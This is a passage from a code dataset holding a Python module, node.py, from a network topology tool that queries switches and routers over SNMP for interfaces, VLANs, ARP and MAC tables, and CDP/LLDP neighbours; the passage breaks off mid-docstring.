"line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.pad", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.asanyarray", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 58, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.uint16", "line_number": 63, "usage_type": "attribute"}, {"api_name": "cv2.namedWindow", "line_number": 72, "usage_type": "call"}, {"api_name": "cv2.WINDOW_AUTOSIZE", "line_number": 72, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 74, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "29352840219", "text": "# -*- coding: utf-8 -*-\n# vim: noai:et:tw=80:ts=4:ss=4:sts=4:sw=4:ft=python\n\n\"\"\"\n node.py\n\"\"\"\nfrom about_time import about_time\nfrom alive_progress import alive_bar, config_handler\nimport binascii\nfrom dataclasses import dataclass\nfrom functools import cached_property\nfrom pysnmp.smi.rfc1902 import ObjectIdentity\nimport re\nfrom sysdescrparser import sysdescrparser\nfrom typing import Union, List, Any\n# Nettopo Imports\nfrom nettopo.core.constants import (\n DCODE,\n NODE,\n NOTHING,\n RESERVED_VLANS,\n retcode_type_map,\n node_type_map,\n mac_type_map,\n bridge_status_map,\n stp_state_map,\n entphyclass_type_map,\n int_oper_status_map,\n int_type_map,\n 
int_admin_status_map,\n)\nfrom nettopo.core.data import (\n BaseData,\n DataTable,\n LinkData,\n VssData,\n VssMemberData,\n StackData,\n StackMemberData,\n EntData,\n VPCData,\n SVIData,\n LoopBackData,\n VLANData,\n ARPData,\n MACData,\n InterfaceData,\n)\nfrom nettopo.core.exceptions import NettopoSNMPError, NettopoNodeError\nfrom nettopo.core.snmp import SNMP\nfrom nettopo.core.util import (\n timethis,\n bits_from_mask,\n normalize_host,\n normalize_port,\n ip_2_str,\n ip_from_cidr,\n format_ios_ver,\n mac_hex_to_ascii,\n parse_allowed_vlans,\n lookup_table,\n is_ipv4_address,\n return_pretty_val,\n return_snmptype_val,\n bits_2_megabytes,\n get_oid_index,\n oid_endswith,\n)\nfrom nettopo.oids import Oids, CiscoOids, GeneralOids\n\n# Typing shortcuts\n_ULSIN = Union[list, str, int, None]\n_UIS = Union[int, str]\n_USN = Union[str, None]\n_UISO = Union[int, str, ObjectIdentity]\n_UAN = Union[Any, None]\n_ULN = Union[list, None]\n_UEN = Union[EntData, None]\n\n# Easy access to our OIDs\no = Oids()\ng = GeneralOids()\nc = CiscoOids()\n# Global defaults for alive-progress bar\nconfig_handler.set_global(theme='smooth')\n\n\nclass Node(BaseData):\n def __init__(self, ip: str, immediate_query: bool=False, **kwargs) -> None:\n self.ip = ip\n self.snmp = SNMP(self.ip, **kwargs)\n self.queried = False\n self.show_items = ['name', 'ip', 'plat', 'ios', 'serial',\n 'router', 'vss', 'stack']\n self.name = None\n self.descr = None\n self.os = None\n self.model = None\n self.vendor = None\n self.version = None\n self.ips = None\n self.router = False\n self.ospf = None\n self.ospf_id = None\n self.bgp_las = None\n self.hsrp_pri = None\n self.hsrp_vip = None\n self.stack = None\n self.vss = None\n self.serial = None\n self.svis = None\n self.vlans = None\n self.loopbacks = None\n self.bootfile = None\n self.ent = None\n self.vpc = None\n self.interfaces = None\n self.if_table = None\n self.ip_table = None\n self.arp_table = None\n self.mac_table = None\n self.cdp = None\n self.lldp = None\n self.links = []\n if immediate_query:\n self.query_node()\n\n @staticmethod\n def _has_value(thing: Any) -> bool:\n if not hasattr(thing, 'value'):\n return False\n elif thing.value in [o.ERR, o.ERR_INST, '0', '']:\n return False\n else:\n return True\n\n @staticmethod\n def _link_ios(ios, link: LinkData) -> LinkData:\n if ios.startswith('0x'):\n try:\n ios = binascii.unhexlify(ios[2:])\n except:\n pass\n if isinstance(ios, bytes):\n ios = ios.decode('utf-8')\n link.remote_desc = ios\n try:\n sys = sysdescrparser(ios)\n link.remote_os = sys.os\n link.remote_model = sys.model\n link.remote_vendor = sys.vendor\n link.remote_version = sys.version\n except:\n pass\n link.remote_ios = format_ios_ver(ios)\n return link\n\n def use_vlan_community(self, vlan: _UIS) -> _USN:\n original_community = self.snmp.community\n community = f\"{original_community}@{str(vlan)}\"\n if self.snmp.check_community(community):\n return original_community\n else:\n raise NettopoSNMPError(f\"ERROR: {community} failed {self.ip}\")\n\n def snmp_get(self, item: _UISO, is_bulk: bool=False,\n vlan: _UIS=None) -> _UAN:\n results = None\n error = False\n if vlan:\n old_community = self.use_vlan_community(vlan)\n try:\n if is_bulk:\n results = self.snmp.get_bulk(item)\n else:\n results = self.snmp.get_val(item)\n except Exception as e:\n error = e\n finally:\n if vlan:\n self.snmp.community = old_community\n if error:\n return error\n return results\n\n def query_node(self) -> None:\n \"\"\" Query this node with option to reset\n \"\"\"\n if 
self.queried:\n            print(f\"{self.name} has already been queried.\")\n            return\n        with alive_bar(title='Node Query') as bar:\n            self.queried = True\n            snmp_name = self.snmp_get(o.SYSNAME)\n            if self._has_value(snmp_name):\n                self.name = normalize_host(\n                    snmp_name.value,\n                    self.snmp.config.host_domains,\n                )\n            bar()\n            # Description\n            snmp_descr = self.snmp_get(o.SYSDESC)\n            if self._has_value(snmp_descr):\n                self.descr = snmp_descr.value\n                sys = sysdescrparser(snmp_descr.value)\n                self.os = sys.os\n                self.model = sys.model\n                self.vendor = sys.vendor\n                self.version = sys.version\n            bar()\n            # Interfaces\n            self.interfaces = self.build_interface_table()\n            bar()\n            # IPs\n            self.ips = self.get_ips()\n            bar()\n            # Vlans\n            self.vlans = self.get_vlans()\n            bar()\n            # SVIs\n            self.svis = self.get_svis()\n            bar()\n            # loopback\n            self.loopbacks = self.get_loopbacks()\n            bar()\n            # bootfile\n            bootfile = self.snmp_get(o.SYS_BOOT)\n            if self._has_value(bootfile):\n                self.bootfile = bootfile.value\n            bar()\n            # Ent chassis info (serial, ios, platform)\n            self.ent = self.get_ent()\n            bar()\n            # stack\n            self.stack = self.get_stack()\n            bar()\n            # vss\n            self.vss = self.get_vss()\n            bar()\n            # serial\n            if self.vss:\n                if self.vss.enabled and self.vss.serial:\n                    self.serial = self.vss.serial\n            else:\n                serial = self.snmp_get(o.SYS_SERIAL)\n                if self._has_value(serial):\n                    self.serial = serial.value\n            bar()\n            # VPC peerlink populates self.vpc\n            self.vpc = self.get_vpc()\n            bar()\n            # Populates self.arp_table\n            self.arp_table = self.get_arp()\n            bar()\n            # Populates self.mac_table\n            self.mac_table = self.get_cam()\n            bar()\n            # CDP neighbors\n            self.cdp = self.get_cdp()\n            bar()\n            # LLDP neighbors\n            self.lldp = self.get_lldp()\n            bar()\n            self.links = self.create_links()\n            bar()\n            # Routing\n            snmp_router = self.snmp_get(o.IP_ROUTING)\n            if self._has_value(snmp_router) and snmp_router.value == '1':\n                self.router = True\n            bar()\n            if self.router:\n                # OSPF\n                snmp_ospf = self.snmp_get(o.OSPF)\n                if self._has_value(snmp_ospf):\n                    self.ospf = snmp_ospf.value\n                bar()\n                snmp_ospf_id = self.snmp_get(o.OSPF_ID)\n                if self._has_value(snmp_ospf_id):\n                    self.ospf_id = snmp_ospf_id.value\n                bar()\n                # BGP\n                bgp_las = self.snmp_get(o.BGP_LAS)\n                if self._has_value(bgp_las) and bgp_las.value != '0':\n                    # 4500x reports 0 as disabled\n                    self.bgp_las = bgp_las.value\n                bar()\n                # HSRP\n                snmp_hsrp_pri = self.snmp_get(o.HSRP_PRI)\n                if self._has_value(snmp_hsrp_pri):\n                    self.hsrp_pri = snmp_hsrp_pri.value\n                bar()\n                snmp_hsrp_vip = self.snmp_get(o.HSRP_VIP)\n                if self._has_value(snmp_hsrp_vip):\n                    self.hsrp_vip = snmp_hsrp_vip.value\n                bar()\n\n    def create_links(self) -> List[LinkData]:\n        # Combine CDP and LLDP to create links\n        links = self.cdp.copy()\n        for cdp in links:\n            for lldp in self.lldp:\n                if cdp.is_same_link(lldp):\n                    # Remove CDP\n                    links.remove(cdp)\n                    # Injest lldp\n                    cdp.injest_link(lldp)\n                    # Add CDP back\n                    links.append(cdp)\n        # Add LLDP\n        for lldp in self.lldp:\n            if lldp.local_port not in [l.local_port for l in links]:\n                links.append(lldp)\n        return links\n\n    def find_interface(self, item: _UIS, name: str=None) -> InterfaceData:\n        if not name:\n            if isinstance(item, int):\n                name = 'idx'\n            elif isinstance(item, str):\n                name = 'name'\n        for entry in self.interfaces:\n            if item == getattr(entry, name):\n                return entry\n\n    def get_cidr_from_oid(self, oid: str) -> str:\n        ip = \".\".join(oid.split('.')[-4:])\n        if is_ipv4_address(ip):\n            mask = self.snmp_get(f\"{o.IF_IP_NETM}.{ip}\")\n            if self._has_value(mask):\n                mbits = bits_from_mask(mask.value)\n                return f\"{ip}/{mbits}\"\n            else:\n                return 
f\"{ip}/32\"\n\n def lookup_ifname_index(self, idx: int,\n normalize: bool=False) -> _USN:\n ifname = self.snmp_get(f\"{o.IFNAME}.{idx}\")\n if not self._has_value(ifname):\n ifindex = self.snmp_get(f\"{o.IFINDEX}.{idx}\")\n if self._has_value(ifindex):\n ifname = self.snmp_get(f\"{o.IFNAME}.{ifindex.value}\")\n if self._has_value(ifname):\n if normalize:\n return normalize_port(ifname.value)\n else:\n return ifname.value\n\n def get_ifname_index(self, idx: int,\n normalize: bool=True) -> _USN:\n # Look in interfaces first\n if self.interfaces:\n interface = self.find_interface(idx, 'idx')\n if interface:\n return interface.name\n else:\n return self.lookup_ifname_index(idx=idx, normalize=normalize)\n\n def lookup_cidr_index(self, idx: int) -> _ULN:\n \"\"\"\n # From IP-MIB\n ipAdEntTable = \"1.3.6.1.2.1.4.20.1\"\n ipAdEntAddr = \"1.3.6.1.2.1.4.20.1.1\"\n ipAdEntIfIndex = \"1.3.6.1.2.1.4.20.1.2\"\n ipAdEntNetMask = \"1.3.6.1.2.1.4.20.1.3\"\n \"\"\"\n cidrs = []\n if not self.ip_table:\n # Ip table\n self.ip_table = self.snmp_get(g.ipAdEntTable, is_bulk=True)\n ip_entries = self.ip_table.search(g.ipAdEntIfIndex)\n for ip_oid, ip_idx in ip_entries.items():\n if int(ip_idx) == idx:\n ip = \".\".join(ip_oid.split('.')[-4:])\n if is_ipv4_address(ip):\n mask = self.ip_table.table.get(f\"{g.ipAdEntNetMask}.{ip}\",\n None)\n if mask:\n subnet_mask = bits_from_mask(mask)\n cidrs.append(f\"{ip}/{subnet_mask}\")\n else:\n cidrs.append(f\"{ip}/32\")\n return cidrs\n\n def build_interface_table(self) -> List[InterfaceData]:\n \"\"\"\n # From IF-MIB\n ifTable = \"1.3.6.1.2.1.2.2\"\n ifEntry = \"1.3.6.1.2.1.2.2.1\"\n ifIndex = \"1.3.6.1.2.1.2.2.1.1\"\n ifDescr = \"1.3.6.1.2.1.2.2.1.2\"\n ifType = \"1.3.6.1.2.1.2.2.1.3\"\n ifMtu = \"1.3.6.1.2.1.2.2.1.4\"\n ifSpeed = \"1.3.6.1.2.1.2.2.1.5\"\n ifPhysAddress = \"1.3.6.1.2.1.2.2.1.6\"\n ifAdminStatus = \"1.3.6.1.2.1.2.2.1.7\"\n ifOperStatus = \"1.3.6.1.2.1.2.2.1.8\"\n indexed_table = [\n ('1.3.6.1.2.1.2.2.1.1.3', '3'),\n ('1.3.6.1.2.1.2.2.1.2.3', 'GigabitEthernet1/0/1'),\n ('1.3.6.1.2.1.2.2.1.3.3', '6'),\n ('1.3.6.1.2.1.2.2.1.4.3', '9000'),\n ('1.3.6.1.2.1.2.2.1.5.3', '1000000000'),\n ('1.3.6.1.2.1.2.2.1.6.3', '0x88908d1b1781'),\n ('1.3.6.1.2.1.2.2.1.7.3', '1'),\n ('1.3.6.1.2.1.2.2.1.8.3', '1'),\n ('1.3.6.1.2.1.2.2.1.9.3', '6773'),\n ('1.3.6.1.2.1.2.2.1.10.3', '3428545753'),\n ('1.3.6.1.2.1.2.2.1.11.3', '12200292'),\n ('1.3.6.1.2.1.2.2.1.13.3', '0'),\n ('1.3.6.1.2.1.2.2.1.14.3', '0'),\n ('1.3.6.1.2.1.2.2.1.15.3', '0'),\n ('1.3.6.1.2.1.2.2.1.16.3', '528472411'),\n ('1.3.6.1.2.1.2.2.1.17.3', '14091342'),\n ('1.3.6.1.2.1.2.2.1.19.3', '0'),\n ('1.3.6.1.2.1.2.2.1.20.3', '0')\n ]\n \"\"\"\n interfaces = []\n if not self.if_table:\n # If table\n self.if_table = self.snmp_get(g.ifTable, is_bulk=True)\n if_entries = self.if_table.search(\n g.ifIndex,\n return_type='val',\n )\n for if_entry in if_entries:\n idx = int(if_entry)\n idx_table = self.if_table.index_table(idx)\n if_name = idx_table.get(f\"{g.ifDescr}.{idx}\")\n # Skip unrouted VLAN ports and Stack ports\n if if_name.startswith(('unrouted', 'Null', 'Stack')):\n continue\n if_mac = idx_table.get(f\"{g.ifPhysAddress}.{idx}\")\n mac = mac_hex_to_ascii(if_mac)\n # Skip interfaces we do not have a MAC.\n # Such as previously stacked switches.\n if mac == '0000.0000.0000':\n continue\n # We have an interface let's build\n interface = InterfaceData()\n interface.idx = idx\n interface.name = normalize_port(if_name)\n interface.mac = mac\n interface.cidrs = self.lookup_cidr_index(idx)\n if_type = 
idx_table.get(f\"{g.ifType}.{idx}\")\n interface.media = int_type_map.get(int(if_type))\n if_admin_status = idx_table.get(f\"{g.ifAdminStatus}.{idx}\")\n interface.admin_status = int_admin_status_map.get(int(if_admin_status))\n if_oper_status = idx_table.get(f\"{g.ifOperStatus}.{idx}\")\n interface.oper_status = int_oper_status_map.get(int(if_oper_status))\n interfaces.append(interface)\n return interfaces\n\n def get_ips(self) -> list:\n \"\"\" Collects and stores all the IPs for Node\n returns - list of IPs\n \"\"\"\n ips = []\n for entry in self.interfaces:\n if entry.cidrs:\n ips.extend([cidr.split('/')[0] for cidr in entry.cidrs])\n ips.sort()\n return ips\n\n def get_ent_from_index(self, idx: int):\n snmp_serial = self.snmp_get(f\"{o.ENTPHYENTRY_SERIAL}.{idx}\")\n serial = snmp_serial.value if self._has_value(snmp_serial) else None\n snmp_plat = self.snmp_get(f\"{o.ENTPHYENTRY_PLAT}.{idx}\")\n plat = snmp_plat.value if self._has_value(snmp_plat) else None\n snmp_ios = self.snmp_get(f\"{o.ENTPHYENTRY_SOFTWARE}.{idx}\")\n ios = snmp_ios.value if self._has_value(snmp_ios) else None\n return serial, plat, ios\n\n def build_ent_from_oid(self, oid, ent_snmp) -> _UEN:\n idx = get_oid_index(oid, 12)\n serial, plat, ios = self.get_ent_from_index(idx)\n # Modular switches have IOS on module\n if not ios:\n # Search modules '9'\n mod_oids = ent_snmp.search('9', item_type='val',\n return_type='oid')\n if mod_oids:\n for mod_oid in mod_oids:\n mod_idx = get_oid_index(mod_oid, 12)\n mod_ios = self.snmp_get(f\"{o.ENTPHYENTRY_SOFTWARE}.{mod_idx}\")\n if self._has_value(mod_ios):\n ios = mod_ios.value\n break\n ios = format_ios_ver(ios)\n if all([serial, plat, ios]):\n return EntData(serial, plat, ios)\n\n def get_ent(self) -> _UEN:\n # TODO: IOS is incorrect for IOS-XE at least.\n ent_snmp = self.snmp_get(o.ENTPHYENTRY_CLASS, is_bulk=True)\n # Search chassis '3'\n chs_oids = ent_snmp.search('3', item_type='val', return_type='oid')\n if chs_oids:\n for chs_oid in chs_oids:\n ent = self.build_ent_from_oid(chs_oid, ent_snmp)\n if ent:\n return ent\n\n def get_loopbacks(self) -> List[InterfaceData]:\n return [entry for entry in self.interfaces \\\n if entry.media == 'softwareLoopback']\n\n def get_svis(self) -> List[SVIData]:\n svis = []\n svi_table = self.snmp_get(o.SVI_VLANIF, is_bulk=True)\n for oid, val in svi_table.table.items():\n vlan = get_oid_index(oid, 14)\n svi = SVIData(vlan)\n interface = self.find_interface(int(val), 'idx')\n if interface:\n svi.ips = interface.cidrs\n svis.append(svi)\n return svis\n\n def get_vlans(self) -> List[VLANData]:\n vlans = []\n vlan_table = self.snmp_get(o.VLANS_NEW, is_bulk=True)\n for oid, name in vlan_table.table.items():\n # get VLAN ID from OID\n vid = get_oid_index(oid)\n if vid not in RESERVED_VLANS:\n vlans.append(VLANData(vid, name))\n return vlans\n\n def get_stack(self)-> StackData:\n stack_roles = ['master', 'member', 'notMember', 'standby']\n stack = StackData()\n stack_snmp = self.snmp_get(o.STACK, is_bulk=True)\n for oid, val in stack_snmp.table.items():\n if oid.startswith(f\"{o.STACK_NUM}.\"):\n idx = get_oid_index(oid, 14)\n mem = StackMemberData()\n mem.num = int(val)\n role_num = stack_snmp.table.get(f\"{o.STACK_ROLE}.{idx}\", \"\")\n for role in enumerate(stack_roles, start=1):\n if int(role_num) == role[0]:\n mem.role = role[1]\n if mem.role and mem.role != 'notMember':\n mem.pri = stack_snmp.table.get(f\"{o.STACK_PRI}.{idx}\", \"\")\n mem.img = stack_snmp.table.get(f\"{o.STACK_IMG}.{idx}\", \"\")\n mem.serial, mem.plat, mem.ios = 
self.get_ent_from_index(idx)\n mac = stack_snmp.table.get(f\"{o.STACK_MAC}.{idx}\", \"\")\n if mac:\n mem.mac = mac_hex_to_ascii(mac)\n stack.members.append(mem)\n if len(stack.members) > 1:\n stack.enabled = True\n stack.count = len(stack.members)\n return stack\n\n def get_vss(self) -> VssData:\n vss_snmp = self.snmp_get(o.VSS, is_bulk=True)\n if not vss_snmp.table:\n return\n vss_mode = vss_snmp.table.get(o.VSS_MODE, \"\")\n if vss_mode == '2':\n vss = VssData()\n vss.enabled = True\n vss.domain = vss_snmp.table.get(o.VSS_DOMAIN, \"\")\n chassis = 0\n vss_mod_snmp = self.snmp_get(o.VSS_MODULES, is_bulk=True)\n vss_mods = vss_mod_snmp.search('1', item_type='val')\n if vss_mods:\n for _oid, _val in vss_mods.items():\n modidx = get_oid_index(_oid, 14)\n # we want only chassis - line card module have no software\n serial, plat, ios = self.get_ent_from_index(modidx)\n if ios:\n member = VssMemberData()\n member.ios = ios\n member.plat = plat\n member.serial = serial\n vss.members.append(member)\n chassis += 1\n if chassis > 1:\n break\n return vss\n\n def get_vpc(self) -> Union[VPCData, None]:\n \"\"\" If VPC is enabled,\n Return the VPC domain and interface name of the VPC peerlink.\n \"\"\"\n vpc_table = self.snmp_get(o.VPC_PEERLINK_IF, is_bulk=True)\n if vpc_table.table:\n for oid, val in vpc_table.table.items():\n vpc = VPCData()\n vpc.domain = get_oid_index(oid)\n vpc.ifname = self.get_ifname_index(int(val))\n return vpc\n\n def get_arp(self) -> List[ARPData]:\n \"\"\"\n {'1.3.6.1.2.1.3.1.1.2.45.1.10.0.20.1': '0x88908d1b17d6',\n '1.3.6.1.2.1.3.1.1.2.45.1.10.0.20.10': '0x843497a26eee',\n '1.3.6.1.2.1.3.1.1.2.45.1.10.0.20.105': '0x0026552a2b10',\n '1.3.6.1.2.1.3.1.1.2.45.1.10.0.20.106': '0x78e7d18f87bc',\n '1.3.6.1.2.1.3.1.1.2.45.1.10.0.20.112': '0x843dc69858d6',\n '1.3.6.1.2.1.3.1.1.2.46.1.10.0.21.1': '0x88908d1b17e8',\n '1.3.6.1.2.1.3.1.1.2.47.1.10.0.23.1': '0x88908d1b17c4',\n '1.3.6.1.2.1.3.1.1.2.47.1.10.0.23.20': '0x1803731622e1',\n '1.3.6.1.2.1.3.1.1.2.47.1.10.0.23.113': '0x843dc69858da',\n '1.3.6.1.2.1.3.1.1.2.47.1.10.0.23.220': '0x000c29b53a59',\n '1.3.6.1.2.1.3.1.1.2.47.1.10.0.23.246': '0x84b51708b63e',\n '1.3.6.1.2.1.3.1.1.2.48.1.10.0.24.1': '0x88908d1b17c1',\n '1.3.6.1.2.1.3.1.1.2.49.1.10.0.25.1': '0x88908d1b17f1',\n '1.3.6.1.2.1.3.1.1.2.50.1.10.0.26.1': '0x88908d1b17e5',\n '1.3.6.1.2.1.3.1.1.2.51.1.10.0.27.1': '0x88908d1b17d5',\n '1.3.6.1.2.1.3.1.1.2.52.1.10.0.28.1': '0x88908d1b17d9',\n '1.3.6.1.2.1.3.1.1.2.53.1.10.0.29.1': '0x88908d1b17e8',\n '1.3.6.1.2.1.3.1.1.2.54.1.10.0.30.1': '0x88908d1b17e5',\n '1.3.6.1.2.1.3.1.1.2.55.1.10.0.0.1': '0x88908d1b17d1',\n '1.3.6.1.2.1.3.1.1.2.55.1.10.0.0.2': '0x28940fe5fac1',\n '1.3.6.1.2.1.3.1.1.2.55.1.10.0.0.5': '0x001c7f707f0f',\n '1.3.6.1.2.1.3.1.1.2.56.1.172.16.1.1': '0x88908d1b17c1',\n '1.3.6.1.2.1.3.1.1.2.57.1.172.16.2.1': '0x88908d1b17cd',\n '1.3.6.1.2.1.3.1.1.2.58.1.172.16.3.1': '0x88908d1b17dd',\n '1.3.6.1.2.1.3.1.1.2.59.1.10.10.0.1': '0x88908d1b17e9',\n '1.3.6.1.2.1.3.1.1.2.60.1.10.20.0.1': '0x88908d1b17f9',\n '1.3.6.1.2.1.3.1.1.2.61.1.172.16.10.1': '0x88908d1b17cd',\n '1.3.6.1.2.1.3.1.1.2.65.1.10.0.31.1': '0x88908d1b17d5',\n '1.3.6.1.2.1.3.1.1.2.66.1.10.0.32.1': '0x88908d1b17d5',\n '1.3.6.1.2.1.3.1.1.2.67.1.10.0.33.1': '0x88908d1b17c5',\n '1.3.6.1.2.1.3.1.1.2.71.1.10.0.11.1': '0x88908d1b17d4',\n '1.3.6.1.2.1.3.1.1.2.72.1.10.0.37.1': '0x88908d1b17c5',\n '1.3.6.1.2.1.3.1.1.2.75.1.10.0.34.1': '0x88908d1b17c9',\n '1.3.6.1.2.1.3.1.1.2.76.1.10.0.35.1': '0x88908d1b17d9',\n '1.3.6.1.2.1.3.1.1.2.77.1.10.0.36.1': '0x88908d1b17d5',\n 
'1.3.6.1.2.1.3.1.1.2.115.1.10.0.124.1': '0x88908d1b17c0',\n '1.3.6.1.2.1.3.1.1.2.116.1.10.0.125.1': '0x88908d1b17f2',\n '1.3.6.1.2.1.3.1.1.2.117.1.10.0.126.1': '0x88908d1b17ec',\n '1.3.6.1.2.1.3.1.1.2.121.1.10.0.127.1': '0x88908d1b17d2',\n '1.3.6.1.2.1.3.1.1.2.122.1.10.0.128.1': '0x88908d1b17de',\n '1.3.6.1.2.1.3.1.1.2.123.1.10.0.129.1': '0x88908d1b17c8',\n '1.3.6.1.2.1.3.1.1.2.124.1.10.0.130.1': '0x88908d1b17fe'}\n \"\"\"\n _arp_oid = '1.3.6.1.2.1.3.1.1.2'\n arps = []\n arp_table = self.snmp_get(_arp_oid, is_bulk=True)\n for oid, val in arp_table.table.items():\n oid_end = oid.split(f\"{_arp_oid}.\")[1]\n end_list = oid_end.split('.')\n idx = end_list.pop(0)\n _ = end_list.pop(0)\n ip = '.'.join(end_list)\n interface = self.get_ifname_index(int(idx))\n mac = mac_hex_to_ascii(val)\n arps.append(ARPData(ip, mac, interface))\n return arps\n\n def get_macs_for_vlan(self, vlan: int) -> List[MACData]:\n ''' MAC addresses for a single VLAN\n _stp = '1.3.6.1.2.1.17.2.15.1'\n _stp_port = f'{_stp}.1'\n _stp_priority = f'{_stp}.2'\n _stp_state = f'{_stp}.3'\n _mac = '1.3.6.1.2.1.4.22.1'\n _mac_vlan = '1.3.6.1.2.1.4.22.1.1'\n _mac_mac = '1.3.6.1.2.1.4.22.1.2'\n _mac_ip = '1.3.6.1.2.1.4.22.1.3'\n _mac_type_map = '1.3.6.1.2.1.4.22.1.4'\n '''\n _cam = '1.3.6.1.2.1.17.4.3.1'\n _bridge_mac = '1.3.6.1.2.1.17.4.3.1.1'\n _bridge_port = '1.3.6.1.2.1.17.4.3.1.2'\n _bridge_stat = '1.3.6.1.2.1.17.4.3.1.3'\n _bridge_if = '1.3.6.1.2.1.17.1.4.1.2'\n macs = []\n # Get the dynamic CAM table for this VLAN\n cam_table = self.snmp_get(_cam, is_bulk=True, vlan=vlan)\n if not cam_table.table:\n return macs\n ifindex_table = self.snmp_get(_bridge_if, is_bulk=True, vlan=vlan)\n for oid, val in cam_table.search(_bridge_mac).items():\n idx = oid.split(f\"{_bridge_mac}.\")[1]\n index_cam = cam_table.index_table(idx)\n mac = mac_hex_to_ascii(val)\n portnum = index_cam.get(f\"{_bridge_port}.{idx}\")\n status_num = index_cam.get(f\"{_bridge_stat}.{idx}\")\n status = bridge_status_map.get(status_num)\n if portnum == '0':\n port = 'NotLearned'\n else:\n ifidx = ifindex_table.search(\n f\"{_bridge_if}.{portnum}\",\n return_type='val',\n )[0]\n port = self.get_ifname_index(int(ifidx))\n entry = MACData(vlan, mac, port, status)\n macs.append(entry)\n return macs\n\n def get_cam(self) -> List[MACData]:\n ''' MAC address table from this node\n '''\n mac_table = []\n # Grab CAM table for each VLAN\n for vlan in self.vlans:\n macs = self.get_macs_for_vlan(vlan.vid)\n if macs:\n mac_table.extend(macs)\n return mac_table\n\n def get_link(self, ifidx: int, link: LinkData=None) -> LinkData:\n if not link:\n link = LinkData()\n link.discovered_proto = 'Unknown'\n if not link.local_interface:\n if link.local_port:\n # Check local interfaces for name\n interface = self.find_interface(link.local_port, 'name')\n else:\n # Check local interfaces for index\n interface = self.find_interface(ifidx, 'idx')\n if interface:\n link.add_local_interface(interface)\n if not link.local_port:\n local_port = self.get_ifname_index(ifidx)\n if local_port:\n link.local_port = local_port\n link_type = self.snmp_get(f\"{o.TRUNK_VTP}.{ifidx}\")\n if self._has_value(link_type):\n if link_type.value == '2':\n link.link_type = 'trunk'\n elif link_type.value == '1':\n link.link_type = 'access'\n else:\n link.link_type = 'unknown'\n # trunk\n if link.link_type == 'trunk':\n native_vlan = self.snmp_get(f\"{o.TRUNK_NATIVE}.{ifidx}\")\n if self._has_value(native_vlan):\n link.local_native_vlan = native_vlan.value\n trunk_allowed = 
self.snmp_get(f\"{o.TRUNK_ALLOW}.{ifidx}\")\n if self._has_value(trunk_allowed):\n link.local_allowed_vlans = parse_allowed_vlans(trunk_allowed.value)\n # LAG membership\n lag = self.snmp_get(f\"{o.LAG_LACP}.{ifidx}\")\n if self._has_value(lag):\n interface = self.find_interface(int(lag.value), 'idx')\n if interface:\n link.local_lag = interface.name\n link.local_lag_ips = interface.cidrs\n link.remote_lag_ips = []\n # VLAN info\n vlan = self.snmp_get(f\"{o.IF_VLAN}.{ifidx}\")\n if self._has_value(vlan):\n link.vlan = vlan.value\n return link\n\n def get_cdp(self) -> List[LinkData]:\n \"\"\" Get a list of CDP neighbors.\n Returns a list of LinkData's.\n Will always return an array.\n # CDP (BULK)\n CDP: str = '1.3.6.1.4.1.9.9.23.1.2.1.1'\n CDP_IPADDR: str = '1.3.6.1.4.1.9.9.23.1.2.1.1.4'\n CDP_IOS: str = '1.3.6.1.4.1.9.9.23.1.2.1.1.5'\n # CDP_DEVID + .ifidx.53\n CDP_DEVID: str = '1.3.6.1.4.1.9.9.23.1.2.1.1.6'\n CDP_DEVPORT: str = '1.3.6.1.4.1.9.9.23.1.2.1.1.7'\n CDP_DEVPLAT: str = '1.3.6.1.4.1.9.9.23.1.2.1.1.8'\n # CDP_INT 6.ifidx\n CDP_INT: str = '1.3.6.1.4.1.9.9.23.1.1.1.1.'\n \"\"\"\n _cdp_mib = '1.3.6.1.4.1.9.9.23.1'\n _cdp_ipaddr = '1.3.6.1.4.1.9.9.23.1.2.1.1.4'\n _cdp_ios = '1.3.6.1.4.1.9.9.23.1.2.1.1.5'\n _cdp_devname = '1.3.6.1.4.1.9.9.23.1.2.1.1.6'\n _cdp_devport = '1.3.6.1.4.1.9.9.23.1.2.1.1.7'\n _cdp_devplat = '1.3.6.1.4.1.9.9.23.1.2.1.1.8'\n # CDP_INT 6.ifidx\n _cdp_int = '1.3.6.1.4.1.9.9.23.1.1.1.1.'\n # get list of CDP neighbors\n neighbors = []\n cdp = self.snmp_get(_cdp_mib, is_bulk=True)\n # process only if this row is a _cdp_devname\n for oid, name in cdp.search(_cdp_devname).items():\n link = LinkData()\n link.discovered_proto = 'cdp'\n link.remote_name = normalize_host(\n name,\n self.snmp.config.host_domains,\n )\n idx1 = get_oid_index(oid, 14)\n idx2 = get_oid_index(oid, 15)\n idx = \".\".join([str(idx1), str(idx2)])\n link = self.get_link(idx1, link)\n index_cdp = cdp.index_table(idx)\n # get remote IP\n rip = index_cdp.get(f\"{_cdp_ipaddr}.{idx}\")\n link.remote_ip = ip_2_str(rip)\n # Lookup MAC with IP from arp_table\n if link.remote_ip:\n for arp in self.arp_table:\n if link.remote_ip == arp.ip:\n link.remote_mac = arp.mac\n # get remote port\n rport = index_cdp.get(f\"{_cdp_devport}.{idx}\")\n link.remote_port = normalize_port(rport)\n # get remote platform\n remote_plat = index_cdp.get(f\"{_cdp_devplat}.{idx}\")\n link.remote_plat = remote_plat\n # get IOS version\n rios_bytes = index_cdp.get(f\"{_cdp_ios}.{idx}\")\n link = self._link_ios(rios_bytes, link)\n neighbors.append(link)\n return neighbors\n\n def get_lldp(self) -> List[LinkData]:\n \"\"\" Get a list of LLDP neighbors.\n Returns a list of LinkData's\n Will always return an array.\n NEW_LLDP_MIB: str = '1.0.8802.1.1.2'\n LLDP: str = '1.0.8802.1.1.2.1.4'\n LLDP_TYPE: str = '1.0.8802.1.1.2.1.4.1.1.6.0'\n LLDP_DEVID: str = '1.0.8802.1.1.2.1.4.1.1.5.0'\n LLDP_DEVPORT: str = '1.0.8802.1.1.2.1.4.1.1.7.0'\n LLDP_DEVPDSC: str = 